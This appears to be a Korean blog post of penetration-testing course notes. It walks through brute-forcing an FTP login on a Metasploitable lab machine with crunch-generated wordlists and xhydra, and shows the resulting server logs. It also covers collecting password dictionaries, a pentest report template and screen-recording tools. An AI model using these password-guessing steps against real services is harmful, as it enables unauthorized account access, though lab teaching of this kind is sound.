(Debian 계열) # useradd -m -s /bin/bash user1 ; passwd user1
$ sudo useradd -m -s /bin/bash user1 (/etc/sudoers)
$ sudo passwd user1
Enter new UNIX password: user1
Retype new UNIX password: user1
passwd: password updated successfully
-> user1 사용자의 암호를 user1으로 설정한다.
$ cat /etc/passwd | grep --color user1
user1:x:1003:1003::/home/user1:/bin/bash
$ sudo cat /etc/shadow | grep --color user1
user1:$1$C/z.wtw5$9xIpcoOi03LF5IS.CrzYw/:16401:0:99999:7:::
$ ftp localhost 21
Connected to localhost.
220 (vsFTPd 2.3.4)
Name (localhost:msfadmin): user1
331 Please specify the password.
Password: user1
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> quit
221 Goodbye.
$
(Kali Linux)
● xhydra 프로그램에서 사용할 사전 파일을 생성한다.
# cd /root/bin
# crunch --help
crunch version 3.6
Crunch can create a wordlist based on criteria you specify. The outout from crunch
can be sent to the screen, file, or to another program.
Usage: crunch <min> <max> [options]
where min and max are numbers
Please refer to the man page for instructions and examples on how to use crunch.
# crunch 1 3
# crunch 1 3 klz
# crunch 1 3 klz > wordlist.txt
# crunch 1 5 user1 > user.list
Crunch will now generate the following amount of data: 22460 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 3905
# cat user.list
..... (중략) .....
111re
111rr
111r1
1111u
1111s
1111e
1111r
11111
# grep --color user1 user.list
user1
# xhydra /* 이전에 실행한 툴 */
Target 탭:
Single Target : 192.168.10.134
Port : 21
Protocol : ftp
Output Options:
[ v ] Be Verbose
[ v ] Debug
Password 탭:
Username
[ v ] Username : user1
Password
[ v ] Passwd list : /root/bin/user.list
Start 탭:
하단에 있는 "Start" 선택
(참고) xhydra 툴의 가장 하단의 명령어 확인
(주의) /root/bin/user.list 파일 직접 편집
# vi /root/bin/user.list
상단 부분에 "user1" 입력
user1 입력후 뒤에 부분은 모두 삭제한다.(dG)
(Metasploitable V2)
$ sudo cat /var/log/vsftpd.log ($ sudo tail -f /var/log/vsftpd.log)
..... (중략) ....
Wed Nov 26 20:10:39 2014 [pid 5981] [user1] FAIL LOGIN: Client "192.168.10.50"
Wed Nov 26 20:10:39 2014 [pid 5991] [user1] FAIL LOGIN: Client "192.168.10.50"
Wed Nov 26 20:10:39 2014 [pid 5985] [user1] FAIL LOGIN: Client "192.168.10.50"
Wed Nov 26 20:10:39 2014 [pid 5983] [user1] FAIL LOGIN: Client "192.168.10.50"
Wed Nov 26 20:10:39 2014 [pid 5993] [user1] FAIL LOGIN: Client "192.168.10.50"
Wed Nov 26 20:10:39 2014 [pid 5996] CONNECT: Client "192.168.10.50"
Wed Nov 26 20:10:39 2014 [pid 5998] CONNECT: Client "192.168.10.50"
Wed Nov 26 20:10:39 2014 [pid 6000] CONNECT: Client "192.168.10.50"
Wed Nov 26 20:10:39 2014 [pid 6002] CONNECT: Client "192.168.10.50"
Wed Nov 26 20:10:39 2014 [pid 6004] CONNECT: Client "192.168.10.50"
Wed Nov 26 20:10:39 2014 [pid 6006] CONNECT: Client "192.168.10.50"
Wed Nov 26 20:10:39 2014 [pid 6008] CONNECT: Client "192.168.10.50"
Wed Nov 26 20:10:39 2014 [pid 6010] CONNECT: Client "192.168.10.50"
Wed Nov 26 20:10:39 2014 [pid 6012] CONNECT: Client "192.168.10.50"
Wed Nov 26 20:10:40 2014 [pid 5989] [user1] OK LOGIN: Client "192.168.10.50"
Wed Nov 26 20:10:41 2014 [pid 5995] [user1] FAIL LOGIN: Client "192.168.10.50"
Wed Nov 26 20:10:41 2014 [pid 5997] [user1] FAIL LOGIN: Client "192.168.10.50"
Wed Nov 26 20:10:41 2014 [pid 5999] [user1] FAIL LOGIN: Client "192.168.10.50"
Wed Nov 26 20:10:41 2014 [pid 6001] [user1] FAIL LOGIN: Client "192.168.10.50"
Wed Nov 26 20:10:41 2014 [pid 6003] [user1] FAIL LOGIN: Client "192.168.10.50"
Wed Nov 26 20:10:41 2014 [pid 6007] [user1] FAIL LOGIN: Client "192.168.10.50"
Wed Nov 26 20:10:41 2014 [pid 6005] [user1] FAIL LOGIN: Client "192.168.10.50"
Wed Nov 26 20:10:41 2014 [pid 6009] [user1] FAIL LOGIN: Client "192.168.10.50"
Wed Nov 26 20:10:41 2014 [pid 6011] [user1] FAIL LOGIN: Client "192.168.10.50"
Wed Nov 26 20:10:42 2014 [pid 5987] [user1] FAIL LOGIN: Client "192.168.10.50"
$ sudo cat /var/log/auth.log
..... (중략) .....
Nov 26 20:09:58 metasploitable vsftpd: pam_unix(ftp:auth): authentication failure; logname= uid=0 euid=0 tty=ftp ruser=user1 rhost=192.168.10.50 user=user1
Nov 26 20:10:29 metasploitable last message repeated 160 times
Nov 26 20:10:39 metasploitable last message repeated 57 times
Nov 26 20:10:56 metasploitable sshd[6014]: Accepted password for msfadmin from 192.168.10.50 port 54028 ssh2
Nov 26 20:10:56 metasploitable sshd[6016]: pam_unix(sshd:session): session opened for user msfadmin by (uid=0)
Nov 26 20:11:05 metasploitable sudo: msfadmin : TTY=pts/1 ; PWD=/home/msfadmin ; USER=root ; COMMAND=/bin/cat /var/log/vsftpd.log
Nov 26 20:11:05 metasploitable sudo: pam_unix(sudo:session): session opened for user root by msfadmin(uid=0)
Nov 26 20:11:05 metasploitable sudo: pam_unix(sudo:session): session closed for user root
Nov 26 20:13:14 metasploitable sudo: msfadmin : TTY=pts/1 ; PWD=/home/msfadmin ; USER=root ; COMMAND=/bin/cat /var/log/auth.log
[과제] 사전 파일을 모으자.
● 인터넷을 통해 사전 파일을 모아보자.
[예제1]
<사전파일1> : Oracle Database 10gR2
<사전파일2> : Oracle Database 11gR2
<사전파일3> : Oracle Database 12c
.....
# cat (사전파일1) (사전파일2) (사전파일3) > (새로운 사전파일)
EX) # cat file1 file2 file3 > file4
[예제2]
<기본암호 사전파일>
<인터넷상에서 구한 사전파일>
# cat (기본암호 사전파일) (인터넷상에서 구한 사전파일) > (새로운 사전파일)
EX) # cat file1 file2 > file3
[예제3]
<인터넷상에서 구한 사전파일1>
<인터넷상에서 구한 사전파일2>
# cat (사전파일1) (사전파일2) | sort -u > (새로운 사전파일)
EX) # cat file1 file2 | sort -u > file3
[실습] 사전 파일 만들기 예제
사용 시스템
- KaliLinux
# mkdir -p /test && cd /test
# rm -rf /test/*
# echo 1111 > passwd1.txt
# echo 2222 > passwd2.txt
# echo 3333 > passwd3.txt
# cat passwd1.txt passwd2.txt passwd3.txt
# cat passwd1.txt passwd2.txt passwd3.txt > result.txt
# cat result.txt
# cat passwd3.txt passwd1.txt > result.txt
# cat result.txt
# vi passwd1.txt
1111
2222
3333
4444
# vi passwd2.txt
6666
3333
1111
7777
# vi passwd3.txt
3333
22
7777
1010
# cat passwd1.txt passwd2.txt passwd3.txt | sort -u > result.txt
# cat result.txt
보고서 제출 단계
보고서 작성시
● 첫번째장에는 프로젝트를 수행한 개요와 목적이 들어간다.(EX: 모의해킹의 정의등)
● 수행한 일정과 멤버에 대해 정확하게 제시를 해줘야 한다.(EX: 프로젝트 수행 진단자(컨설턴트))
● 수행대상/수행한 장소에 대해 표기한다.(EX: 00서비스외 #개)
● 수행방법론에 대해 표기한다.(EX: 모의침투에 전반적인 수행 방법론)
● 보고서안에는 컨설팅업체 자신들만의 방법론을 기재하면 더욱 돋보인다.(EX: 차별화된 보고서)
발표자료와 보고서
● 발표자료와 보고서는 구분하여 작성하여야 한다.
[실습] (샘플)보고서를 보고 발표자료를 어떤식으로 만들지를 논의해 보자.
중간/최종 보고서
발표자료
■ 프로젝트 개요
■ 프로젝트 목적
■ 모의 해킹 : 2013년 2월 일(월) ~ 2월 일(금)
■ 투입 인원 : 1M/M
■ 모의 해킹 일정
2월10일(월)
2월11일(화)
2월12일(수)
2월13일(목)
2월14일(금)
환경분석
외부모의해킹
외부모의해킹
외부모의해킹
중간보고서
2월17일(월)
2월18일(화)
2월19일(수)
2월20일(목)
2월21일(금)
환경분석
내부모의해킹
내부모의해킹
내부모의해킹
최종보고서
담당자
수행범위
연락처
홍길동
외부/내부 모의해킹
000-0000-0000
이순신
무선 네트워크 진단
000-0000-0000
수행단계
설명
정보 수집
대상에 대한 서버/네트워크/서비스에 대한 불필요한 서비스 접근 가능성, 외부에서 파악할 수 있는 정보를 수집하는 단계
취약점 수집
네트워크 구간별로 적합한 취약점 스캔도구를 이용하여 발생 할 수 있는 취약점에 대한 정보를 수집하는 단계(단, 네트워크 장비/서비스에 장애를 유발할 수 있는 경우는 제외)
침투 단계
취약점 수집 단계를 통해 획득한 정보를 기반으로 수동 점검을 통해 내부 시스템까지 침투할 가능성이 있는 시나리오 기반으로 접근하는 단계
상세 분석
취약점이 도출됐을 경우 공격에 의해 보안 위협이 시스템과 비지니스 측면에서 어느 정도의 영향을 줄 수 있는지 분석하는 단계
보고서 작성
도출된 취약점에 대한 총평/영향도/상세분석/보안 가이드가 포함된 보고서를 작성하는 단계
■ 보고서(시나리오 작성과 점검 항목)
■ 보고서(총평/요약/상세 내역)
[참고] 동영상 녹화 프로그램 종류
동영상 녹화 프로그램 종류
● recordMyDesktop
● gtk-recordMyDesktop
● qt-recordMyDesktop
프로그램 > 시스템 도구 > 소프트웨어 추가/삭제
> 검색 부분에 'recordmydesktop' 입력한다.
-> 출력결과: gtk-recordmydesktop-0.3.8.-4.1
프로그램 > 음악과 비디오 > recordMyDesktop 실행
or
# gtk-recordmydesktop
# gtk-recordmydesktop
-> 사운드 품질 부분에는 체크를 제거한다. 에러나면 캡쳐가 되지 않는다.
-> 녹음/녹화 시작
-> 오른쪽 상단에 녹음/녹화 종료를 선택한다. 인코딩 작업이 진행된다.
-> 다른 이름으로 저장하기 선택(적당한 위치 선택(EX: /root/Desktop))
-> 끝내기 선택
out.ovg 파일을 out.avi 파일로 편환하기
# apt-get install mencoder
# mencoder -idx out.ogv -ovc lavc -o out.avi
-idx (also see -forceidx)
Rebuilds index of files if no index was found, allowing seek‐
ing. Useful with broken/incomplete downloads, or badly cre‐
ated files.
NOTE: This option only works if the underlying media supports
seeking (i.e. not with stdin, pipe, etc).
-ovc <codec name>
Encode with the given video codec (no default set).
NOTE: Use -ovc help to get a list of available video codecs.
EXAMPLE:
-ovc copy
no encoding, just streamcopy
-ovc raw
Encode to an arbitrary uncompressed format (use '-vf
format' to select).
-ovc lavc
Encode with a libavcodec codec.
-o <filename>
Outputs to the given filename.
If you want a default output filename, you can put this op‐
tion in the MEncoder config file.
'모의해킹 침해대응 전문가 과정' 카테고리의 다른 글
| 20160530 정보수집단계/프로그래밍 기초 (0) | 2016.05.31 |
|---|---|
| 20160527 정보수집단계 (0) | 2016.05.28 |
| 20160524 네트워크이론/정보수집단계 (0) | 2016.05.26 |
| 20160523 네트워크이론 (0) | 2016.05.26 |
| 20160520 네트워크이론 (0) | 2016.05.21 |